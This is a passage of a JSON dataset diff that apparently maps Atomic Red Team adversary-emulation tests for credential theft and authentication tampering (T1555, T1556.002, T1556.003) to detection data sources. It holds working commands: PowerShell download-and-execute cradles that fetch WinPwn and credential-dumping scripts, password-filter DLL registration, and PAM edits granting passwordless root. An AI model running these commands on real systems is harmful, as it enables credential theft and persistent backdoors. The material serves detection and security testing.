that request authentication through NTLM or Kerberos\nhttps://blog.malwarebytes.com/101/2016/01/the-windows-vaults/\nhttps://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "vaultcmd /listcreds:\"Windows Credentials\"\n" + } + }, + { + "name": "WinPwn - Loot local Credentials - Invoke-WCMDump", + "auto_generated_guid": "fa714db1-63dd-479e-a58e-7b2b52ca5997", + "description": "Loot local Credentials - Invoke-WCMDump technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/DumpWCM.ps1')\nInvoke-WCMDump", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1555", + "command_list": [ + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1555\\src\\T1555-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n", + "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force \n", + "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force\n", + "vaultcmd /listcreds:\"Windows Credentials\" /all\n", + "vaultcmd /listcreds:\"Web Credentials\" /all\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nlazagnemodule -consoleoutput -noninteractive", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds -consoleoutput -noninteractive ", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer -consoleoutput -noninteractive " + ], + "commands": [ + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1555\\src\\T1555-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n", + "source": "atomics/T1555/T1555.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores" + }, + { + "command": "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force \n", + "source": "atomics/T1555/T1555.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores" + }, + { + "command": "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force\n", + "source": "atomics/T1555/T1555.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores" + }, + { + "command": "vaultcmd /listcreds:\"Windows Credentials\" /all\n", + "source": "atomics/T1555/T1555.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores" + }, + { + "command": "vaultcmd /listcreds:\"Web Credentials\" /all\n", + "source": "atomics/T1555/T1555.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nlazagnemodule -consoleoutput -noninteractive", + "source": "atomics/T1555/T1555.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds -consoleoutput -noninteractive ", + "source": "atomics/T1555/T1555.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer -consoleoutput -noninteractive ", + "source": "atomics/T1555/T1555.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1555", + "display_name": "Credentials from Password Stores", + "atomic_tests": [ + { + "name": "Extract Windows Credential Manager via VBA", + "auto_generated_guid": "234f9b7c-b53d-4f32-897b-b880a6c9ea7b", + "description": "This module will extract the credentials found within the Windows credential manager and dump\nthem to $env:TEMP\\windows-credentials.txt\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Microsoft Word must be installed\n", + "prereq_command": "try {\n New-Object -COMObject \"word.Application\" | Out-Null\n $process = \"winword\"\n Stop-Process -Name $process\n exit 0\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft Word manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1555\\src\\T1555-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n", + "cleanup_command": "Remove-Item \"$env:TEMP\\windows-credentials.txt\" -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]", + "auto_generated_guid": "c89becbe-1758-4e7d-a0f4-97d2188a23e3", + "description": "This module will extract the credentials from Windows Credential Manager", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force \n" + } + }, + { + "name": "Dump credentials from Windows Credential Manager With PowerShell [web Credentials]", + "auto_generated_guid": "8fd5a296-6772-4766-9991-ff4e92af7240", + "description": "This module will extract the credentials from Windows Credential Manager", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force\n" + } + }, + { + "name": "Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]", + "auto_generated_guid": "36753ded-e5c4-4eb5-bc3c-e8fba236878d", + "description": "This module will enumerate credentials stored in Windows Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "vaultcmd /listcreds:\"Windows Credentials\" /all\n" + } + }, + { + "name": "Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]", + "auto_generated_guid": "bc071188-459f-44d5-901a-f8f2625b2d2e", + "description": "This module will enumerate credentials stored in Web Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "vaultcmd /listcreds:\"Web Credentials\" /all\n" + } + }, + { + "name": "WinPwn - Loot local Credentials - lazagne", + "auto_generated_guid": "079ee2e9-6f16-47ca-a635-14efcd994118", + "description": "The [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve lots of passwords stored on a local computer. \nEach software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). \nThis tool has been developed for the purpose of finding these passwords for the most commonly-used software", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nlazagnemodule -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "WinPwn - Loot local Credentials - Wifi Credentials", + "auto_generated_guid": "afe369c2-b42e-447f-98a3-fb1f4e2b8552", + "description": "Loot local Credentials - Wifi Credentials technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds -consoleoutput -noninteractive ", + "name": "powershell" + } + }, + { + "name": "WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords", + "auto_generated_guid": "db965264-3117-4bad-b7b7-2523b7856b92", + "description": "Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer -consoleoutput -noninteractive ", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1556.002", + "command_list": [ + "$passwordFilterName = (Copy-Item \"PathToAtomicsFolder\\T1556.002\\src\\AtomicPasswordFilter.dll\" -Destination \"C:\\Windows\\System32\" -PassThru).basename\n$lsaKey = Get-Item \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\"\n$notificationPackagesValues = $lsaKey.GetValue(\"Notification Packages\")\n$notificationPackagesValues += $passwordFilterName\nSet-ItemProperty \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\" \"Notification Packages\" $notificationPackagesValues\nRestart-Computer -Confirm\n" + ], + "commands": [ + { + "command": "$passwordFilterName = (Copy-Item \"PathToAtomicsFolder\\T1556.002\\src\\AtomicPasswordFilter.dll\" -Destination \"C:\\Windows\\System32\" -PassThru).basename\n$lsaKey = Get-Item \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\"\n$notificationPackagesValues = $lsaKey.GetValue(\"Notification Packages\")\n$notificationPackagesValues += $passwordFilterName\nSet-ItemProperty \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\" \"Notification Packages\" $notificationPackagesValues\nRestart-Computer -Confirm\n", + "source": "atomics/T1556.002/T1556.002.yaml", + "name": "Atomic Red Team Test - Modify Authentication Process: Password Filter DLL" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1556.002", + "display_name": "Modify Authentication Process: Password Filter DLL", + "atomic_tests": [ + { + "name": "Install and Register Password Filter DLL", + "auto_generated_guid": "a7961770-beb5-4134-9674-83d7e1fa865c", + "description": "Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_dll": { + "description": "Path to DLL to be installed and registered", + "type": "Path", + "default": "PathToAtomicsFolder\\T1556.002\\src\\AtomicPasswordFilter.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll})\n", + "prereq_command": "if (Test-Path #{input_dll}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own password filter dll\"\n" + } + ], + "executor": { + "command": "$passwordFilterName = (Copy-Item \"#{input_dll}\" -Destination \"C:\\Windows\\System32\" -PassThru).basename\n$lsaKey = Get-Item \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\"\n$notificationPackagesValues = $lsaKey.GetValue(\"Notification Packages\")\n$notificationPackagesValues += $passwordFilterName\nSet-ItemProperty \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\" \"Notification Packages\" $notificationPackagesValues\nRestart-Computer -Confirm\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1556.003", + "command_list": [ + "sudo sed -i \"#{index}s,^,#{pam_rule}\\n,g\" /etc/pam.d/su-l\n", + "sudo sed -i \"#{index}s,^,auth sufficient pam_succeed_if.so uid >= 0\\n,g\" #{path_to_pam_conf}\n", + null, + "sudo sed -i \"#{index}s,^,auth sufficient /tmp/pam_evil.so\\n,g\" #{path_to_pam_conf}\n", + "sudo sed -i \"#{index}s,^,#{pam_rule}\\n,g\" #{path_to_pam_conf}\n" + ], + "commands": [ + { + "command": "sudo sed -i \"#{index}s,^,#{pam_rule}\\n,g\" /etc/pam.d/su-l\n", + "source": "atomics/T1556.003/T1556.003.yaml", + "name": "Atomic Red Team Test - Modify Authentication Process: Pluggable Authentication Modules" + }, + { + "command": "sudo sed -i \"#{index}s,^,auth sufficient pam_succeed_if.so uid >= 0\\n,g\" #{path_to_pam_conf}\n", + "source": "atomics/T1556.003/T1556.003.yaml", + "name": "Atomic Red Team Test - Modify Authentication Process: Pluggable Authentication Modules" + }, + { + "command": null, + "source": "atomics/T1556.003/T1556.003.yaml", + "name": "Atomic Red Team Test - Modify Authentication Process: Pluggable Authentication Modules" + }, + { + "command": "sudo sed -i \"#{index}s,^,auth sufficient /tmp/pam_evil.so\\n,g\" #{path_to_pam_conf}\n", + "source": "atomics/T1556.003/T1556.003.yaml", + "name": "Atomic Red Team Test - Modify Authentication Process: Pluggable Authentication Modules" + }, + { + "command": "sudo sed -i \"#{index}s,^,#{pam_rule}\\n,g\" #{path_to_pam_conf}\n", + "source": "atomics/T1556.003/T1556.003.yaml", + "name": "Atomic Red Team Test - Modify Authentication Process: Pluggable Authentication Modules" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1556.003", + "display_name": "Modify Authentication Process: Pluggable Authentication Modules", + "atomic_tests": [ + { + "name": "Malicious PAM rule", + "auto_generated_guid": "4b9dde80-ae22-44b1-a82a-644bf009eb9c", + "description": "Inserts a rule into a PAM config and then tests it.\n\nUpon successful execution, this test will insert a rule that allows every user to su to root without a password.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_pam_conf": { + "description": "PAM config file to modify.", + "type": "String", + "default": "/etc/pam.d/su-l" + }, + "pam_rule": { + "description": "Rule to add to the PAM config.", + "type": "String", + "default": "auth sufficient pam_succeed_if.so uid >= 0" + }, + "index": { + "description": "Index where the rule is inserted.", + "type": "Integer", + "default": 1 + } + }, + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo sed -i \"#{index}s,^,#{pam_rule}\\n,g\" #{path_to_pam_conf}\n", + "cleanup_command": "sudo sed -i \"\\,#{pam_rule},d\" #{path_to_pam_conf}\n" + } + }, + { + "name": "Malicious PAM module", + "auto_generated_guid": "65208808-3125-4a2e-8389-a0a00e9ab326", + "description": "Creates a PAM module, inserts a rule to use it, and then tests it.\n\nUpon successful execution, this test will create a PAM module that allows every user to su to root without a password.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_pam_conf": { + "description": "PAM config file to modify.", + "type": "String", + "default": "/etc/pam.d/su-l" + }, + "pam_rule": { + "description": "Rule to add to the PAM config.", + "type": "String", + "default": "auth sufficient /tmp/pam_evil.so" + }, + "index": { + "description": "Index where the rule is inserted.", + "type": "Integer", + "default": 1 + }, + "path_to_pam_module_source": { + "description": "Path to PAM module source code.", + "type": "Path", + "default": "PathToAtomicsFolder/T1556.003/src/pam_evil.c" + }, + "path_to_pam_module": { + "description": "Path to PAM module object", + "type": "Path", + "default": "/tmp/pam_evil.so" + } + }, + "dependencies": [ + { + "description": "The PAM development library must be installed to build the PAM module\n", + "prereq_command": "if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "if [ -n \"`which apt-get`\" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n \"`which yum`\" ]; then sudo yum -y install pam-devel; fi\n" + }, + { + "description": "The PAM module must exist on disk at specified location (#{path_to_pam_module})\n", + "prereq_command": "if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo sed -i \"#{index}s,^,#{pam_rule}\\n,g\" 